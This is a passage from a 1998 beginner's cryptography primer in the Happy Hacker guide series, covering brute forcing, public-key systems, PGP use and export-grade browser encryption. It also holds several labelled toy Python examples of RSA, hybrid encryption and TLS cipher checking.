Now I have to confuse you again, but all will be made clear. The big key and strong algorithm don't *guarantee* a strong system necessarily. Why? Well, it's always possible that YOU the user can mess everything up and make the whole dang thing insecure by trusting the wrong person with your key, not knowing who has access to your computer, setting crypto stuff up wrong, and just not being careful. Having big muscles and the knowledge to defend yourself won't make you safe if you happen to be drunk when attacked.
But back to the whole "big key" thing: it doesn't really have anything to do with the guts of the algorithm that encrypts and decrypts your message. The algorithm just uses the key to do the job. The reason everyone's stuff after being put through the same algorithm looks different is because each time, the same algorithm is put into motion, but using a different key - one from each person.

B. What's "brute forcing?"

Making sure your key is nice and big just makes it harder to guess the key if you were going down the list of all possible keys. This is called a "brute force" attack. This means that if you have a six-digit number, you could crack the key by starting guessing it at 000001 then 000002 then 000003 on the way to 999999 till you get the key. A typical ATM pin number four digits long would be harder to "brute force" if it were ten numbers. The number of guesses you would have to go through to get the key increases hugely each time a number is added to a key, and your poor PC is worked overtime in the rush to figure out all the possible combinations.

~~~~~~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~~~~~~~~~~

You can brute force a key of two digits in your head. Get a friend to think of a two-digit number, and not tell you. Easy to guess, right? There are only 99 numbers it could possibly be, so you count down the list till you guess the right one. Now tell your friend to add just one more teensy little digit, so they have a secret number with three digits. Now there are 999 possible numbers it could be. See? 999 may only have one more digit than 99, but it's more than ten times bigger. It gets ten times harder each time you add a digit. You can still try to guess it, but how high do you feel like counting?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

With modern keys of 4096 bits, brute forcing takes dang near forever and there are just more intelligent ways of doing it.
This is why the brute force method of cracking a large key is the very last resort of any smart cryptanalyst (those are the guys that crack the crypto stuff, remember?). And if a key can ever be brute forced, that means it's reeeeaaaaalllllly weak.

Unfortunately some cryptosystem engineers haven't figured out that a bigger key isn't necessarily a better system. For instance, the PCS phone carrier that I use advertised the safety of talking on their phones by saying that "Our phones are so friggin' secure that in order to break through their communications privacy you'd have to guess four trillion keys in less than a second! Hoo yah! We're all that!" They didn't use those actual words, but it was something like that. Anyway, you know by now that they were talking about a brute force attack. The problem is that they didn't really look at the rest of the actual cryptosystem they used. Then some really awesome hackers looked at the actual system and process they used to encrypt the communication (remember the "algorithm?") and found some mathematical flaws that would allow anyone with a little ingenuity and some common equipment to decrypt the phone call information. Needless to say I made fun of my PCS people forEVER after that.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cool thing: That was an actual true story. The algorithm is called CMEA, and it is used in an awful lot of PCS phones that communicate using a certain kind of behavior (or "protocol"). Check out the hack at: http://www.counterpane.com/cmea.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

***************************************************
Other note: The president of Counterpane Systems that published the hack is Bruce Schneier and you're going to be hearing his name a lot. He wrote the ultimately vital cryptography book "Applied Cryptography." If you're really into cryptography you probably already have it, but I'll get into that later.
***************************************************

So remember. A stupid cryptosystem that happens to use a key seven gazillion digits long is still a stupid cryptosystem. You might as well just write the message on a dang postcard in large letters and attach a big neon sign to it that reads "Private but unprotected data! Don't read! Please! You might have to take all my money! Aaaaaa!"

C. What is "public key" supposed to mean?

Easy. You know how the ciphers we've been talking about have a secret key that both encrypts AND decrypts the message? Public key systems have two different keys that each will do one of those things. Okay okay, hold on. First let's have a little "Words You Need To Know" update:

A cryptosystem that uses the same key to encrypt and decrypt the data is called a "symmetrical cipher." The reason for that should be obvious: because the whole process thing is the same on either end, only reversed like a mirror image. That's why they use the word "symmetry." And you can guess what they call a system that has a different key for each purpose ... yeah, an "asymmetrical cipher" (Asymmetrical just means "not symmetrical"). Other more ordinary words for these systems are "private key" or "secret key" crypto for symmetrical, and "public key" for asymmetrical. Okay, you got the terms lah dee dah yeehaw let's get on with it.

The problem started when people got sick of having to go through the hassle of getting the great and powerful secret key back and forth between the senders and receivers and all that stuff. I mean, how many ways can you get a secret key to someone without an eavesdropper snatching it en route? Not many. So some guy at Bell Labs came up with the genius idea of a system that would generate two numbers based on a certain kind of mathematical problem. When one of the numbers was used to encrypt data, only the other number generated with it would decrypt it. Whoa!
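The two-number trick just described, as an added toy example that is not the primer's own code: a textbook RSA key pair (the RSA scheme is named in section D below) built from two tiny constructed primes, with the public number handed out for encrypting and the private number kept back for decrypting. The last function shows what an attacker has to do instead, which is solve the factoring problem for the published number; that takes a split second at this size, and is why real keys are built from primes hundreds of digits long. No padding is used, so this is for understanding the idea only.

```python
from math import gcd, isqrt


def is_prime(n):
    """Trial division; fine for the toy sizes used here."""
    if n < 2:
        return False
    return all(n % d for d in range(2, isqrt(n) + 1))


def modinv(a, m):
    """Extended Euclid: the x with a*x == 1 (mod m)."""
    old_r, r, old_x, x = a, m, 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_x, x = x, old_x - q * x
    if old_r != 1:
        raise ValueError("no inverse")
    return old_x % m


def generate_keypair(p, q, e=17):
    """Make the two numbers the primer describes from two secret primes.
    Public key (n, e) goes to everybody; private key (n, d) stays with you."""
    assert is_prime(p) and is_prime(q) and p != q
    n = p * q
    phi = (p - 1) * (q - 1)
    assert gcd(e, phi) == 1
    d = modinv(e, phi)
    return (n, e), (n, d)


def encrypt(public_key, m):
    """Anyone holding the public number can do this."""
    n, e = public_key
    assert 0 <= m < n, "message must be a number smaller than n"
    return pow(m, e, n)


def decrypt(private_key, c):
    """Only the matching private number undoes it."""
    n, d = private_key
    return pow(c, d, n)


def recover_private_key(public_key):
    """The attacker's route: factor n to get p and q, then rebuild d.
    Trial division works for a four-digit n; for real key sizes nothing known does."""
    n, e = public_key
    for p in range(2, isqrt(n) + 1):
        if n % p == 0:
            return n, modinv(e, (p - 1) * (n // p - 1))
    raise ValueError("n has no small factor")


# Constructed toy primes; real keys use primes of hundreds of digits.
TOY_P, TOY_Q = 61, 53

if __name__ == "__main__":
    pub, priv = generate_keypair(TOY_P, TOY_Q)
    c = encrypt(pub, 65)  # 65 is a constructed one-character message
    print(pub, priv, c, decrypt(priv, c), recover_private_key(pub))
```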
It was expanded upon by some cryptographers in Britain, and then some guys at Stanford came up with an even better idea (not even knowing about the previous work!). I'll tell you about those people in a sec.

So you would generate the two numbers you'd use as keys (called a key pair). Give everybody in the universe one of the keys, and keep the other one on a floppy disc in your ventilation duct or your underwear drawer or somewhere else really private. Anyone who encrypted a message to you with the key that you gave them would be making a ciphertext that nothing in the world could decrypt except the key you have hidden between your undies and your socks.

Nowadays there are a few different systems that use this clever little scheme hiding in your underwear. You can imagine how popular it is, no need to sneak around slipping floppies under doors and all that irritating cloak and dagger stuff. You download and install the software, generate the keys, and start emailing people your public key. If somebody encrypts something with your public key, only your private key can decrypt it. When you want to email someone an encrypted message, you get their public key. If you encrypt a message with somebody else's public key, only their private key can decrypt it. Reeeeeeaaaallll simple.

Little secret: about fourteen years before these guys invented this system, the US government was talking to military cryptodudes and the NSA about this same problem but with nuclear missile signaling systems. They wanted some way of getting encrypted messages to the missile's computers in a way that wouldn't give anybody else the chance to get the key. So the NSA is saying that they had public key stuff a while back. Here's some of the NSA info and also information on the web about the Bell Labs papers and British discoveries about Public Key crypto way back in like 1970: http://www.cesg.gov.uk/ellisint.htm http://jya.com/nsam-160.htm.

D. What's a Diffie-Hellman and who's RSA?
Check it out, those are just different kinds of systems and keys. Diffie-Hellman keys are generated using a specific method for public key crypto, and RSA keys are generated using a completely different method for public key crypto. The basic public key thing is the same, but the two systems come up with the keys in a different way and go about the crypto thing using different algorithms. Whitfield Diffie, Ralph Merkle and Martin Hellman independently thought up a great way of generating a key pair in 1976 using a really tripped out math problem called the "discrete logarithm" problem. I ain't even going near explaining that, it's gonna hafta wait. Then the next year, some more brainiacs named Ron Rivest, Adi Shamir and Leonard Adleman invented the RSA scheme that essentially does the same job but based on a different mathematical problem called the "Integer Factorization Problem." Again, not touchin' it with a ten-foot pole. I'll go into it later. Much later. So keys created using Diffie, Merkle and Hellman's method are still called "Diffie-Hellmans." In fact, the newer ones are getting more popular because they can be used for digital signatures and everything. RSA still does all this stuff too and also is a big huge company. Funny thing: The early public key discoveries made at Bell Labs and in Britain's crypto unit from 1970 through 1974 used these SAME math problems. Then the others came up with them later on out of nowhere without even seeing the older work. Freaky huh? _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! 
And don't expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed.

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 Tim "No Sinister Nickname" Skorick. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.

_________________________________________________________

____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 8, Part 2
The Magical Mystical Crypto-Primer
____________________________________________________________

by Tim "No Sinister Nickname" Skorick

V. WHAT'S THE EASIEST WAY TO GET INTO ALL THIS? (or "Phil Gets Paid")

A. PGP and where to get it

Awright, some of you cipherpunks knew this was coming. By far the easiest way to play around with cryptography is by getting your own free copy of PGP. PGP stands for "Pretty Good Privacy" and was created a while back by a real fun math teacher named Phil Zimmermann. It was only command-line-based, meaning you had to do those annoying DOS-like commands and switches and all that, and there wasn't any Windows-type point and click. They (him and his friends) finally came up with a Windows version but then promptly sold the whole thing to a company called Network Associates.

~~~~~~~~~~~~~~~~~~~~~~~~
Go Get It!
~~~~~~~~~~~~~~~~~~~~~~~~

Go to http://bs.mit.edu:8001/pgp-form.html This is the Massachusetts Institute of Technology website where you can still get PGP version 5.0 for Windows. Now you could get the *new* PGP version 5.5 from http://www.nai.com/products/security/pgpfreeware.asp but that version will only let you send and get messages encrypted with a Diffie-Hellman key, and not an RSA key. If you want to play with both, you have to get the older freeware.
Now either way, you're going to have to fill out a questionnaire at least promising that you're located in the USA and that you aren't going to email a copy of the software to "Bob the UnaHacker" in some terrorist country. I'm going to explain that in a little bit.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Okay, let me assume for the sake of easiness that you're going to be running PGP on some flavor of Windows or possibly on a Mac. Doesn't matter which, it'll work the same on most of them.

1. Install it on your computer.
2. When it asks you which key type you want to generate, start with Diffie-Hellman just for the heck of it.
3. When it asks you for the size of key you want, just pick the biggest (heck, ya might as well).
4. You then get to pound random data out of your keyboard and then watch this fun little animation thingy.
5. So it finishes. The first thing you'll notice is that they automatically give you the keys of just about everybody who has ever worked at or near PGP. No biggie. You're good to go with the cryptofun.

B. Playing with PGP

First things first: your clipboard is your friend. Oh yes, make friends with your clipboard. Verrrrrry important. Take him out to dinner, date his sister, tell him he's cool. You'll be using him quite a bit. What makes PGP so user-friendly isn't only that it works with all these different operating systems ... it also uses only the most idiotically simple parts of all these operating systems. You know what the "copy" and "paste" functions are on most computers, right? To "copy" you hit Ctrl-C and it writes stuff that you selected onto your clipboard, and "paste" is just Ctrl-V and it copies the stuff back onto your document wherever you want. Your clipboard is just the way-station, so where better to use encryption and decryption functions? So remember:

1. To mess with the data, get it onto your clipboard.
2. To look at what you did to it, move it from your clipboard onto a document somewhere.
If you ever want to see what's on your clipboard at the moment, go to the PGP menu and select the thing that says "Launch Associated Viewer."

The encryption fun goes like this:

1. Type some goofy simple little letter to yourself:

Dear Tim, quit doing that with your eyes or they'll freeze that way.

2. Highlight all the text with your mouse.
3. Hit Ctrl-C. (It just copied the letter onto your clipboard.)
4. Select from your PGP menu "Encrypt clipboard."
5. When it shows you all your public keys of people to write to, choose your own.
6. Drag and drop your name onto the "recipient" list.
7. Hit "ok." (It just encrypted everything on your clipboard but left the ciphertext there.)
8. Go back to your document.
9. Click somewhere down below the plaintext you already typed.
10. Hit Ctrl-V to paste. SPLAT!
11. Look at that mess!

-----BEGIN PGP MESSAGE-----
Version: PGP for Personal Privacy 5.0
MessageID: B7gCHs7p6DU/TxZ7XFDbRklmHhdaWbBU

qANQR1DBw04Djbfak/0G+g0QEACBqiGqyQEM8itHm0VGIvPovTWQwV27ARi/kScm
Ffk+ekdHKelizo52sAzCN35+5JvO9F+rPTjgIOnDynhflfDoMc8sFJggrU+srXPR
MQR6X53eOmYZOBQmXcg8GiVRgl+RyN1ZlqiKPV05Edl/UjueyE6koTeQRhbcUtRq
BPLloA26jZcklJZu1lvPvkoAjxq+OuZKWNmlXQziTGMtTtgxDmtF7zZ6wZNCV652
CNGeIZVTMCC8ZAZ91lDq2qKq9fRzIVAyW0K0xMlMBMqTMhJCBScWr6iCCKnOwhFW
OFRRByfOhX5bMiddET8SbL40Qfyc9lLG+xEGuOw6O5xMT5aQdWiSog4idrrBd61K
KjUUglfeDFsni2lqGeUkt/nUcEnMhAApZoXxoKQ6wzZUipOxrMhWeQB8vLNTNmQc
5sPZEapLEioftjh9axL+lF2Z/9XAy0+UnUsjtw7OMhxyvhZWjjQNEko8OvaW7pL0
6eaXooE909ESkRKvkP2CATTVeTinXQk4kSH24SFwDaYxLDMJtGv88jOinKmBhOa0
c3UGKEfRliOgxqq18M6KdJtVOOLzTeiPuKmkwtgOXnt7ky7V1cy61kiBPWjme8Hs
vt0VvFbKitU/dVjfdnrlMKJccG/PgYFYJ/9YM4M5XpSimMNxppLgFCbum3buVnn4
wP82aA//YRq9hkFblfdBk0bIrjOB11O5zo7MCabbkIm+xrQtVM7EZ1AV/OQw1QpM
CvAOIHfq1THi3wWGIU9npMvDnelSsJRpWl2kde2tUDYZWELjSFjPofysFXd02fc2
yGFG+6Eb0a3WzFwSjwVfZUhmUVRGnOVK/WIz+jIAJq08mAUoq9lE7LUblpBgZb3l
4G5iGZ8H0yskYRzzXg5rPV3dV8fyo4pasbJ8tVnQBYZQ7t0MFdl0x/xqBm9fDevX
vTf/atvWBF9+Vp9QepRmZ+ehATYe1N4VBknylhV4SRFar4Sja4BYWVVjYP/k1M6Q
jkQ9jTmulHml317IH9HLdilri8cDosDX6n02QMD6lw/uiWs+ohpgLXuMCqbPLR1L
9y5Kbj2gTdlNUs/3b5RUXRDNjtjqVFpgscgQWNUseZ10P214L6I+lqAIh3qb5gdC
FrKb82fvJdcFwQZtam9JHooyiG11OSRrahdMf2u8C0YWrfCKIDhLEwEaY3lHtk9P
GumJu+9cF6z2hWovHHJ5lvWlwNNOtxohSGxV/3R8F41cQXnUPkPNLxqbYzlqzoZ1
z3Q6dyQ2gBbnjKiQm/VfDpPyKdvkWktl2iR2kyVyDwbP0u8NBQTsbkQ2r9yMPM/3
PHQoT8ME5q3FLOgSirV1YnNQCkTCfOHGb37ZtZlVQYN00gjJVCnJWr8bh9jD19yt
YOvixVgaym2dwCk6e+GBxKtKJ5KgpULANG/tJbY8MZjpw7IyDK6lgo1wmnn4NSjG
JIGLXn8rk44KbT2Qo3SzZftRf8Y+1i49QQ5eEdrFmxz1vg==
=md+y
-----END PGP MESSAGE-----

WOW! That digital oatmeal looks cooler every time I make it. Heh heh heh.

Now at the risk of sounding like Magnum P.I., I know what you're thinking. You're thinking "AAUUUGH! I put my letter through a blender! Oh the humanity!" Just calm down. Remember, it's moronic to encrypt messages that can't be decrypted (this doesn't go for some password protecting ideas and for "digital signatures," but those aren't really messages and we'll chit chat about that in the next primer). At first glance, for all we know, that mess up there might just be random garbage. Guess what? We can prove that it ain't. You wrote the letter to yourself and encrypted it with your own public key, didn't ya? You have your private key and can decrypt the message even easier than you encrypted it! Ha ha ha HA! Here's what ya do:

1. Highlight the entire ciphertext, from the beginning of the "-----BEGIN PGP..." to the end of the "END PGP MESSAGE-----".
2. Hit Ctrl-C to copy it onto your clipboard. (I know it was already there from last time, but let's pretend you just got this particular blob sent to you from somebody else.)
3. Go to wherever your PGP menu is and click on "Decrypt/Verify clipboard" and put in your passphrase when asked for it. (When you see the box that says "Decryption Successful," that means that it just decrypted the stuff on your clipboard but left it there.)
4. Go to your original document and click down past the stuff you already put there.
5. Hit Ctrl-V to paste.
6. Voila!

Dear Tim, quit doing that with your eyes or they'll freeze that way.

Ta-DUM! Isn't this a momentous occasion? I think I'm misty-eyed ...

C. Getting someone else's public key

This is easy. You find the text version of their key on either a website or from a text file or email or whatever. I showed you part of mine; it looks a lot like the encrypted mess we just saw.

1. Highlight the whole thing again, from the beginning of the "-----BEGIN PGP PUBLIC KEY ..." to the end of the "... END PGP PUBLIC KEY BLOCK-----".
2. Then hit Ctrl-C to copy the key to your clipboard.
3. Now go to the PGP menu and just pick the option that says "Add Key from Clipboard."
4. You'll see a window open up telling you that PGP saw the key and knows what it is, and you hit the "import" button.

Simple, huh?

D. What PGP really does

It's a plain and simple truth that most secret-key programs run way faster than public-key systems. So PGP makes the best of both worlds. When you encrypt a message to someone with PGP, it first compresses the message to make sure it won't take up a whole lot of space. It then makes its own little secret symmetric key (like from DES or something) and encrypts the text with that (really fast) symmetrical algorithm. After that, it takes the receiver's public key and encrypts just the secret DES-type key. Since it's only encrypting a key, it goes way quicker than if it were encrypting the whole message. The PGP message is both of these blobs of ciphertext all crammed together.

When the receiver's PGP program gets the message, it uses the private key of the recipient to decrypt the secret key from the blob first (goes quickly cuz it's just a key). It then uses the symmetric key it just deciphered to decrypt the rest of the message from the blob quickly, and decompresses the message the rest of the way into readable form.
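The four-step recipe just described, as an added example that is neither PGP's code nor this guide's. The public-key half is textbook ElGamal (the scheme PGP runs behind its "Diffie-Hellman" key type), done in a toy 31-bit group so the numbers stay readable; the symmetric half is a hash-based stream cipher standing in for PGP's DES-type block cipher. Both are constructed for illustration and are not secure at these sizes:

```python
"""PGP-style hybrid encryption, added as an example (not the guide's or PGP's
own code). It follows the steps the text describes: compress, encrypt the
text with a fresh one-time symmetric key, wrap that key with the recipient's
public key, and bundle the two blobs. The public-key half is textbook
ElGamal with a toy-sized prime (constructed, NOT secure); the symmetric half
is a SHA-256 counter-mode keystream standing in for a real block cipher.
"""
import hashlib
import secrets
import zlib

# Toy group: P is the Mersenne prime 2^31 - 1 and 7 is a primitive root of it.
# Real keys use primes of 1024 bits and up; this size is for readability only.
P = 2**31 - 1
G = 7

def elgamal_keypair():
    """Private x, public y = g^x mod p (constructed toy parameters)."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(G, x, P)

def elgamal_wrap(public_y, session_key):
    """Encrypt an integer session key 0 < k < p to the public key y."""
    r = secrets.randbelow(P - 2) + 1            # fresh randomness per message
    c1 = pow(G, r, P)
    c2 = (session_key * pow(public_y, r, P)) % P
    return c1, c2

def elgamal_unwrap(private_x, wrapped):
    """Recover the session key: c2 / c1^x mod p."""
    c1, c2 = wrapped
    shared = pow(c1, private_x, P)
    return (c2 * pow(shared, -1, P)) % P       # modular inverse, Python 3.8+

def keystream(session_key, nbytes):
    """Counter-mode keystream from SHA-256 (toy stand-in for DES/IDEA/CAST)."""
    out = bytearray()
    counter = 0
    key_bytes = session_key.to_bytes(4, "big")  # session_key < 2^31 fits
    while len(out) < nbytes:
        out += hashlib.sha256(key_bytes + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:nbytes])

def symmetric_xor(session_key, data):
    """One call both encrypts and decrypts (XOR with the keystream)."""
    return bytes(a ^ b for a, b in zip(data, keystream(session_key, len(data))))

def pgp_style_encrypt(recipient_public_y, plaintext):
    """Compress, encrypt with a one-time key, wrap the key: the PGP recipe."""
    compressed = zlib.compress(plaintext.encode("utf-8"))
    session_key = secrets.randbelow(P - 2) + 1   # new key for every message
    body = symmetric_xor(session_key, compressed)
    wrapped_key = elgamal_wrap(recipient_public_y, session_key)
    return {"wrapped_key": wrapped_key, "body": body}

def pgp_style_decrypt(recipient_private_x, message):
    """Unwrap the session key with the private key, then decrypt and inflate."""
    session_key = elgamal_unwrap(recipient_private_x, message["wrapped_key"])
    compressed = symmetric_xor(session_key, message["body"])
    return zlib.decompress(compressed).decode("utf-8")

def can_read(private_x, message):
    """True only if this private key actually opens the message."""
    try:
        pgp_style_decrypt(private_x, message)
        return True
    except (zlib.error, UnicodeDecodeError):
        return False

def round_trip(plaintext="Dear Tim, quit doing that with your eyes or they'll freeze that way."):
    """Encrypt to a fresh key pair and decrypt again; returns (ok, recovered)."""
    x, y = elgamal_keypair()
    msg = pgp_style_encrypt(y, plaintext)
    recovered = pgp_style_decrypt(x, msg)
    return recovered == plaintext, recovered

if __name__ == "__main__":
    print(round_trip())
```

The message dictionary is the "two blobs crammed together": `wrapped_key` is the slow public-key part and is only as long as a key, `body` is the fast symmetric part and is as long as the compressed letter. A holder of the wrong private key unwraps a wrong session key, and the decompression step refuses the resulting garbage.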
VI. OTHER WAYS TO START USING CRYPTO

A. Secure your Netscape connection

- Part One: Your browser COULD be secure:

Dude, it suuuuuuuucks that people haven't done this more often yet. Check it out. If you have the right version, Netscape can connect to cooperating web sites in a really secure way. Try it: instead of typing "http://", type "https://". That tells your net machine to try to connect with the server using its "Secure Sockets Layer." That's the part of your browser that can encrypt everything going between you and the server you're surfing to.

You know the little key type thingy in the lower corner of your browser? It usually has a slash through it or shows an open lock or something. This means you are wandering around the web making non-secure connections. If you hook up a secure connection using "https" to a web server, it will show a complete key, or a closed lock, or various other "locked" looking things.

>Oooooooh! Aaaaaah!<

If you don't see a change, or get a message saying "hey doofus, this isn't an https site," don't worry. Most websites aren't set up to let you connect securely; there's usually no reason to. You'll find the places with "https" addresses at online stores, banks, and other places where security would be needed. I mean, do you REALLY care how many people know you post to the Nine Inch Nails board seven hundred times a day?

- Part Two: It probably ain't

But even if you're connecting to a site that can do the whole secure thang, and even if you do connect and see the "locked" looking thing in the corner, you probably aren't any more secure than you were before. "Why?" you ask. Cuz even then, the crypto connection that your browser is using is probably weak.

- Part Three: Here's why it ain't

Here's the skinny. Our U.S. government people consider crypto technology a weapon, because twenty years ago back in the cold war it was a dangerous thing for your enemy to have.
The United States "Export Law" says that since it's considered a weapon, it's illegal to export out of the country. Why is it such a big freakin deal? Well, America has interests spread out all over the place, and we have spies who pay real close attention to what goes on all over the world, especially in terrorist countries. If terrorists start using strong crypto, we can't eavesdrop on them and maybe tell when they're gonna blow stuff up (not that our spying on these people has kept them from blowing stuff up before now).

Now before you get all in a frenzy, people have been trying to reach an agreement with our intelligence people for a while now. There are a lot of bills in the House and the Senate trying to fix this, but no luck yet. I mean, heck, Congress has only been at it for about six years now, give em a little time ...

So when you download a browser off the net, most people get stuck downloading what's called an "export-grade" web browser. That means one whose crypto stuff is weak enough for the government to feel okay about you exporting it. Don't buy anything off the web with those wimpy little browsers, cuz any cyber-moron that knows how to use a packet sniffer and a cracking utility can read the credit info you buy stuff with.

>Boooooo! Hissssss!<

- Part Four: Here's why that sucks

Netscape can work with all the great crypto stuff out there through its Secure Sockets Layer, but people are usually limited to 40-bit encryption stuff, which is really weak and super lame. Crypto stuff that weak has been cracked left and right. Heck, Bruce Schneier will even give you a SCREEN SAVER that can crack this type of encryption, and it even BRUTE FORCES IT!!!! Can you imagine how weak that is? Sheesh!! You can get it at http://www.counterpane.com/smime.html

- Part Five: Fix it! Help is here!
>sound of trumpets<

This super high-class software guy named Farrell McKay and some of his friends put together a little set of files called "Fortify" that you download right into your browser's home directory, run them, and they just strengthen the SNOT outta your browser. They pump it UP, my friends. Here's what you should do.

First send me a million dollars. Then, go to the "Fortify" website at http://www.fortify.net/index.html. Then check what your connection security is for right now at the link that says "SSL checker" (yes, that stands for "Secure Sockets Layer Checker"). It will tell you whether or not your browser is set on "wimpy mode" or whether or not it can connect to a server in a safe way. It will even list all the different secure connections you could have along with what you actually have.

If that page tells you that your connection is weak, go to the "download" page and get the version that's right for your computer (there isn't a version available for Macs yet). Stick the stuff in the directory that your browser is in and follow whatever other instructions there are. It's easy and really quick to do, and then you have to restart your browser.

Now to check if it worked. Go back to the SSL checker at their site; you might have to hit reload. See what it says? Most versions should connect at a full 128-bit RC-4!

Note: Remember the cryptogenius Ron Rivest who helped create RSA? RC-4 is one of his own special algorithms, and a sweet one at that.

So, you can send and receive super-secret encrypted email that nobody can read, and you can connect with whopping 128-bit RC-4 to participating websites. This would be a good time to rub your hands together and cackle maniacally. Now I know you're hooked ...
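A present-day version of the Fortify "SSL checker", added as an example rather than anything from the Fortify project or from Netscape: ask your own TLS library which cipher suites it would offer, label them the way the text does (40-bit export grade versus 128-bit), and build a context that refuses the weak ones. It uses Python's standard ssl module and makes no network connection; the check is on your own side of the wire:

```python
"""Cipher-strength check and hardening for a TLS client, added as an example
(not Fortify's code, not Netscape's). It does for a Python program what the
Fortify SSL checker did for a browser: list the suites the program would
offer, classify them by key strength, and refuse anything under 128 bits.
"""
import ssl

def classify_strength(bits):
    """Bucket a suite's effective key length in the text's own terms."""
    if bits <= 56:
        return "export-grade (wimpy mode)"   # 40-bit RC4, 40/56-bit DES
    if bits < 128:
        return "weak"                        # e.g. 112-bit 3DES
    return "strong"                          # 128-bit RC4 and up

def cipher_report(context):
    """[(name, protocol, strength_bits, label)] for every suite offered."""
    return [(c["name"], c["protocol"], c["strength_bits"],
             classify_strength(c["strength_bits"]))
            for c in context.get_ciphers()]

def weakest_strength(context):
    """Smallest key strength, in bits, that the context would accept."""
    return min(c["strength_bits"] for c in context.get_ciphers())

def hardened_client_context():
    """Client context that only offers 128-bit-and-up suites with real auth."""
    ctx = ssl.create_default_context()       # certificate checking stays on
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # OpenSSL cipher-list syntax: HIGH means 128-bit keys and up; the
    # exclusions drop anonymous, NULL, export, RC4, 3DES and MD5 suites.
    ctx.set_ciphers("HIGH:!aNULL:!eNULL:!EXPORT:!RC4:!3DES:!MD5")
    return ctx

if __name__ == "__main__":
    ctx = hardened_client_context()
    for name, proto, bits, label in cipher_report(ctx):
        print(f"{name:40} {proto:8} {bits:4} {label}")
    print("weakest offered:", weakest_strength(ctx))
```

Printing the report is the modern equivalent of the checker's list of "all the different secure connections you could have"; `weakest_strength` is the single number to watch, since a connection is only as strong as the weakest suite both sides will agree to.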
VII. WRAP UP STUFF

A. All that confuses is not crypto

The biggest thing to keep in mind when you dig around for good crypto stuff to play with is this: just because it has a fancy-schmancy name like "cryptographic module" and seems to screw up text real good doesn't mean that it is real cryptography. Even if it comes from a big name software company, it ain't necessarily worth your while. Real cryptography is incredibly difficult to make secure. Most of these companies churning out software packages that protect passwords and encrypt little documents and stuff don't bother with any kind of real work in that area. I won't even go into these wiseguys on the web and in hacker rags that write their own stuff and then try to sell you on it. Sheesh! Most of them have no idea what they're getting themselves into. Cryptography is just too tough and experts are few and far between. These warnings are covered a bit more in the web resources section later on. So ...

B. Beware "kindergarten cryptography"

Don't just take someone else's word for it. There are all kinds of interesting ideas floating around about new crypto stuff from people who only sound like they know what they're talking about. From hacker magazines, to newsgroup postings from alleged elite experts, to rave reviews in big computer magazines, everybody seems to know what crypto should be and where to find the good stuff. Ugh.

It ain't the wares that the journalists rave about. It ain't the program that your favorite hacker writes. It ain't the impressive looking plug-in that your favorite software company tries to sell you. The "good stuff" is what survives the tests by the experts. Remember this: learn the names of the experts. Learn the names of the algorithms and cryptosystems. After a long, long, long time on the market and after a wayyyyy lot of tests, the algorithms and systems that live on are the good ones. And that's only for today.
Breakthroughs in computing power have made more than one seemingly secure cryptosystem obsolete. Every algorithm that is untested or unreleased to the public, every algorithm that flies in the face of established mathematical law and number theory, every algorithm that claims to be great but isn't available to be proven is not cryptography, but kindergarten cryptography. Using kindergarten cryptography is even worse than using no cryptography at all. You know why kindergarten cryptography is so dangerous? Because it fools you into thinking it's cryptography, and you use it on private stuff that it isn't really going to protect. If you didn't try to use any crypto at all, at least you would know enough to save the private stuff for later and it would never be at risk!

C. Words you get to throw around!

Awright all you showoffs! You should be able to use all the words down there in quotes even if you can't necessarily give a total definition for some of them. Throw them around, get used to them. Better yet, use them in sentences - around your friends who don't know what they mean :) Yack away!

You know that "Cryptology" is made up of "Cryptography" (or "crypto") and "Cryptanalysis," and the guys that do that are "Cryptographers" and "Cryptanalysts." You know that the "Caesar cipher" was an old way to "encipher" (or "encrypt") something and also to "decipher" (or "decrypt") something. Before you encrypt, the message is still "plaintext," and "ciphertext" is what it is when it's encrypted. A "substitution cipher" ain't the best "cryptosystem" anymore. "Algorithms" are step by step math processes; here's some: "RSA," "IDEA," "DES," "Blowfish," "CAST," "El Gamal," "RC-4," and they all HAVE to use a "key." "Binary" means made up of ones and zeros. A "passphrase" is a series of passwords. "Blocks" are chunks of text; "iterations" are separate encryption steps that your algorithm takes on the blocks.
A "random number generator (RNG)" gives you good random numbers, and nobody will "brute force" your key if it's big enough. "Protocol" means behavior. A "symmetrical cipher" is the same as "private key" crypto, which is also called "secret key" crypto. These are the opposite of "asymmetrical ciphers," which are also known as "public key" crypto, which you use a "key pair" for, like "Diffie-Hellman" keys, which are based on the "discrete logarithm problem," or "RSA keys," which are based on the "Integer Factorization Problem." If it's an asymmetrical cipher, the "encryption algorithm" that turns plaintext into ciphertext is different from the "decryption algorithm" that turns ciphertext back into plaintext. "PGP" can use all these. "Secure Sockets Layer" is how your browser tries to use crypto, but it's hampered by annoying "export law" that limits you to downloading "export-grade" encryption, which is weak. "Fortify" fixes that right up, and it ain't no "kindergarten cryptography." And - look way down at the last book suggestion - "steganography" is the art of hiding messages - usually encrypted ones - someplace where you wouldn't expect.

VIII. WANNA LEARN MORE?

A. Quick web stuff

Real quick ways to get some more entry-level info; most are stuff in Acrobat format!

